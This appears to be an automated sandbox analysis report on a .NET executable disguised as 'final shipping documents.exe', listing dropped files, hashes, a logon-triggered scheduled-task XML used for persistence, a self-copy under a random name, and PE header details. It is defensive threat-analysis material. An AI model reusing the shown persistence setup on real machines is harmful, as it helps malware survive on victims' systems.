Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675762" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GcrdXwPgmZ.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\final shipping documents.exe.log

Download File

Process:	C:\Users\user\Desktop\final shipping documents.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107552
Entropy (8bit):	4.005580296346257
Encrypted:	false
SSDEEP:	768:kql6nCkbGD6Sxnjk0ooMvqjINsLNwzjU1ONPJZ4R1v49jz3lJmKypu3UJhwiAGiE:kjCk46oMvqjK3qhwiAGinrEFBKVnRTob
MD5:	A86B77DC69AC534DC3673DF95A365A23
SHA1:	3AC248F5366076751A80BCB63D5145DC7F5664E3
SHA-256:	DEC19BC8F9B45C55ABF937AC1AF12BA3978CE20524B3F141403453824AC9E848
SHA-512:	5B5C84AD8742AAF194456ACC59937BF9A56A8EF6C59975A385948A1C6C9C37C043055EF8D35FB4FE33B5F6F41C66980D6156BB3507B5311B366E5A93BB17EBC7
Malicious:	false
Preview:	....h... ... ..........P..............X...H...].......................V.......e.n.-.C.H.;.e.n.-.G.B....... ......................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................0..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D.................................

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107552
Entropy (8bit):	4.005959094424109
Encrypted:	false
SSDEEP:	768:kwl6xCkEGD6Sxnjk0ooMvqjINsLNwzjU1ONPJZ4R1v49jz3lJmKypu3UJhwiAGiV:k/Ckp6oMvqjK3qhwiAGinrEFBKVnkTob
MD5:	4C899339E0085F9A4DBA8C2428AFB0BC
SHA1:	17DC38228E834F3F48789D0CCDDEE5A774E58330
SHA-256:	75483D658281B931341B75F5281E7D9A2ACDB8F6005157897F46F22105847785
SHA-512:	BC44FF29FC8F645A3AF94387206AA664353F3D66B31769C529D307821E0B084D8DD84545B3BC2A5E8FA169FB2FC4858C1ABDF1DACEEF960FE1C4BB42D7C18350
Malicious:	false
Preview:	....h... ... ..........P..............X...H...].......................V.......e.n.-.C.H.;.e.n.-.G.B....... ......................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................0..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D.................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Windows[1].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	891
Entropy (8bit):	5.215423601530918
Encrypted:	false
SSDEEP:	12:YWgc2T0VH+4nHmwpkA53c2MvyH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB8QbC:Yzc2TUHLnpkC3c2MvyHt0drc6hE1opM
MD5:	C3202100DA0E4C10B430646901386CCC
SHA1:	F2531384E0C212AF1C056225B63152ABF6164FE5
SHA-256:	738D735E72F8B2A410035262FD0A29CFC4DE6774DFCA490663ECC3404BB6A536
SHA-512:	531B4F6F669407C2023E4835B17FD683294637464753C6EF441F501261AF3B52C26821EEFEED06B7FE0631D5050E14DA9EDE40CC802E9F10BB886126B534D80E
Malicious:	false
Preview:	{"serviceContext":{"serviceActivityId":"628ae679-42e8-47a7-b17c-e6d5619ccf45","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"628ae679-42e8-47a7-b17c-e6d5619ccf45\|2025-01-14T15:39:49.3048679Z\|fabric_msn\|EUS2-A\|News_364","tier":"\u0000","clientActivityId":"36E7B6A2-D31B-4C09-A061-588DA2D36992"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false},"isPartial":false}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.37863791287034
Encrypted:	false
SSDEEP:	48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCsIfA2KRHmOugw1s
MD5:	4BDA11C0A20510A976226EC9222704D4
SHA1:	9CA931BE02907F194929D09FCB9705687290C26A
SHA-256:	DCD265ED373DB7047EF94CCC1CD9870BA3242273C4010BE887A1F6E4443C32E2
SHA-512:	A4690D002AB38B7057FA2A8158375CC665101B420EEE1951442CD56195AC61E7C802140E82E5006048DF7EBF63609C98EC22A2DCE98502E0767C26066132D5EB
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btbnfjsj.hxr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcqf5kdc.baq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fg32yhgg.fwn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4olbrz5.1nh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_motmjfnc.axj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufmpnfkt.vuj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x51otnl1.xw2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yaacyiun.kps.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpA2.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	5.125890793717728
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtCxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTGv
MD5:	AA4EDEAA524FAE7DA5EECEF5B08CE175
SHA1:	5F5DB932B374AF938D25B5E83C5D51C1CEC27AF5
SHA-256:	09399DB6FD74D14DF80B5CE1E6180C89FE1A2295A0E44C186DBB7A53DE290422
SHA-512:	357E4E3706E6F87628E4A3B9E5E655A21009693F35B325E66DADF9F8D5983A2C5EBB8A7B08CF28DFEC256C3F969FAD1EBA8E9CB7E891FBFE470566996314CDBC
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp

Download File

Process:	C:\Users\user\Desktop\final shipping documents.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	5.125890793717728
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtCxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTGv
MD5:	AA4EDEAA524FAE7DA5EECEF5B08CE175
SHA1:	5F5DB932B374AF938D25B5E83C5D51C1CEC27AF5
SHA-256:	09399DB6FD74D14DF80B5CE1E6180C89FE1A2295A0E44C186DBB7A53DE290422
SHA-512:	357E4E3706E6F87628E4A3B9E5E655A21009693F35B325E66DADF9F8D5983A2C5EBB8A7B08CF28DFEC256C3F969FAD1EBA8E9CB7E891FBFE470566996314CDBC
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe

Download File

Process:	C:\Users\user\Desktop\final shipping documents.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	680448
Entropy (8bit):	7.694109286313681
Encrypted:	false
SSDEEP:	12288:Gf6YRxA4Y5lyA/BxSPCR7v7w4+UdUQCqZqGvwpfWySsV7cz7Ha8cAB2RZ+B7c:QRobk4+QDCqZqwwpOCVi5cb07c
MD5:	AD5806FFE238EA11606D3EE49B28C655
SHA1:	953393B81EC159E23C16459681820317F2F63D18
SHA-256:	31E7559F21054ACA8A1CD2287E322F22E03AC6CBC84E1265C8AC1A3367403989
SHA-512:	8C2829AD04E922B5D2F67F3E2EEF2BAE4DD315EA18AF11A5CE80074BEDEAA4C5046DB5D568FA81179ED00CA80C5130A4E9230B3236803DC8C61A12429D6D079F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0..:...&......"X... ...`....@.. ....................................@..................................W..O....`..."........................................................................... ............... ..H............text...P8... ...:.................. ..`.rsrc...."...`...$...<..............@..@.reloc...............`..............@..B.................X......H........T...E......q.......H...........................................>.-.r...ps....zV.-.r...ps....z.o......(.......0.. ........(....r...p(....s......s....}.....(.....{....(....o.....{.....o.....{....r=..p"..@A...s ...o!....{.... ....("...o#....{.....o$....{....rm..po%....{.....o&...."...@"..PAs'...((.....().... .... ....s...(+....(,....{....o-.....r...po....tX...(/....r...p(%....r...po0.....(1....(2.....(3...:.(......o0...6.{.....o4...J..(5...(6...(.....0..........

C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\final shipping documents.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.694109286313681
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	final shipping documents.exe
File size:	680'448 bytes
MD5:	ad5806ffe238ea11606d3ee49b28c655
SHA1:	953393b81ec159e23c16459681820317f2f63d18
SHA256:	31e7559f21054aca8a1cd2287e322f22e03ac6cbc84e1265c8ac1a3367403989
SHA512:	8c2829ad04e922b5d2f67f3e2eef2bae4dd315ea18af11a5ce80074bedeaa4c5046db5d568fa81179ed00ca80c5130a4e9230b3236803dc8c61a12429d6d079f
SSDEEP:	12288:Gf6YRxA4Y5lyA/BxSPCR7v7w4+UdUQCqZqGvwpfWySsV7cz7Ha8cAB2RZ+B7c:QRobk4+QDCqZqwwpOCVi5cb07c
TLSH:	3FE4F155326AD803C4A21EB40A31E3FC27796E99D920C3939FE93DFFB9B6B461504352
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..:...&......"X... ...`....@.. ....................................@................................

File Icon


Icon Hash:	f0aea8aaaa8ee80f

Static PE Info

General

Entrypoint:	0x4a5822
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6785E1D4 [Tue Jan 14 04:02:28 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
and dword ptr [eax], eax
inc eax
add byte ptr [ebx], ah
add byte ptr [eax+eax], ah
and eax, 26005E00h
add byte ptr [edx], ch
add byte ptr [eax], ch
add byte ptr [ecx], ch
add byte ptr [edi], bh
add byte ptr [eax], al
add byte ptr [edx+003E9999h], bl
add byte ptr [eax], al
aas
int CCh
dec esp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa57d0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa6000	0x22e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xaa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
